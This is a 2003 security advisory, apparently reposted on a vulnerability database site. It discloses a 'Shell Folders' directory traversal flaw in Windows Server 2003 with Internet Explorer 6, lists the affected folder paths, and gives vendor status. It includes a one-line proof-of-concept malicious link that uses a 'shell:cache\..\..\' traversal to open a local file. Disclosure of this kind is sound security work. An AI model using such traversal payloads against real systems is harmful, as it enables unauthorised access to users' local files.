`Title:
~~~~~~~~~~~~~~~~~~~~~~~
Microsoft Windows Server 2003 "Shell Folders" Directory Traversal Vulnerability
[http://www.geocities.co.jp/SiliconValley/1667/advisory08e.html]
Date:
~~~~~~~~~~~~~~~~~~~~~~~
8 October 2003
Author:
~~~~~~~~~~~~~~~~~~~~~~~
Eiji James Yoshida [[email protected]]
Vulnerable:
~~~~~~~~~~~~~~~~~~~~~~~
Windows Server 2003 (Internet Explorer 6.0)
Overview:
~~~~~~~~~~~~~~~~~~~~~~~
Windows Server 2003 allows remote attacker to traverse "Shell Folders" directories.
A remote attacker is able to gain access to the path of the %USERPROFILE% folder without guessing a target user name by this
vulnerability.
ex.) %USERPROFILE% = "C:\Documents and Settings\%USERNAME%"
Details:
~~~~~~~~~~~~~~~~~~~~~~~
Windows Server 2003 allows remote attacker to traverse "Shell Folders" directories and access arbitrary files via "shell:[Shell
Folders]\..\" in a malicious link.
[Shell Folders]
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
AppData: "C:\Documents and Settings\%USERNAME%\Application Data"
Cookies: "C:\Documents and Settings\%USERNAME%\Cookies"
Desktop: "C:\Documents and Settings\%USERNAME%\Desktop"
Favorites: "C:\Documents and Settings\%USERNAME%\Favorites"
NetHood: "C:\Documents and Settings\%USERNAME%\NetHood"
Personal: "C:\Documents and Settings\%USERNAME%\My Documents"
PrintHood: "C:\Documents and Settings\%USERNAME%\PrintHood"
Recent: "C:\Documents and Settings\%USERNAME%\Recent"
SendTo: "C:\Documents and Settings\%USERNAME%\SendTo"
Start Menu: "C:\Documents and Settings\%USERNAME%\Start Menu"
Templates: "C:\Documents and Settings\%USERNAME%\Templates"
Programs: "C:\Documents and Settings\%USERNAME%\Start Menu\Programs"
Startup: "C:\Documents and Settings\%USERNAME%\Start Menu\Programs\Startup"
Local Settings: "C:\Documents and Settings\%USERNAME%\Local Settings"
Local AppData: "C:\Documents and Settings\%USERNAME%\Local Settings\Application Data"
Cache: "C:\Documents and Settings\%USERNAME%\Local Settings\Temporary Internet Files"
History: "C:\Documents and Settings\%USERNAME%\Local Settings\History"
My Pictures: "C:\Documents and Settings\%USERNAME%\My Documents\My Pictures"
Fonts: "C:\WINDOWS\Fonts"
My Music: "C:\Documents and Settings\%USERNAME%\My Documents\My Music"
My Video: "C:\Documents and Settings\%USERNAME%\My Documents\My Videos"
CD Burning: "C:\Documents and Settings\%USERNAME%\Local Settings\Application Data\Microsoft\CD Burning"
Administrative Tools: "C:\Documents and Settings\%USERNAME%\Start Menu\Programs\Administrative Tools"
Exploit code:
~~~~~~~~~~~~~~~~~~~~~~~
**************************************************
This exploit reads %TEMP%\exploit.html.
You need to create it.
And click on the malicious link.
**************************************************
Malicious link:
<a href="shell:cache\..\..\Local Settings\Temp\exploit.html">Exploit</a>
Workaround:
~~~~~~~~~~~~~~~~~~~~~~~
None.
Vendor Status:
~~~~~~~~~~~~~~~~~~~~~~~
Microsoft was notified on 9 June 2003.
They plan to fix this bug in a future service pack.
Microsoft Knowledge Base(KB829493)
[http://support.microsoft.com/default.aspx?scid=829493]
Thanks:
~~~~~~~~~~~~~~~~~~~~~~~
Microsoft Security Response Center
Masaki Yamazaki (Japan GTSC Security Response Team)
Youji Okuten (Japan GTSC Security Response Team)
Similar vulnerability:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Microsoft Internet Explorer %USERPROFILE% Folder Disclosure Vulnerability
[http://www.geocities.co.jp/SiliconValley/1667/advisory07e.html]
-------------------------------------------------------------
Eiji James Yoshida
penetration technique research site
E-mail: [email protected]
URL: http://www.geocities.co.jp/SiliconValley/1667/index.htm
-------------------------------------------------------------
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation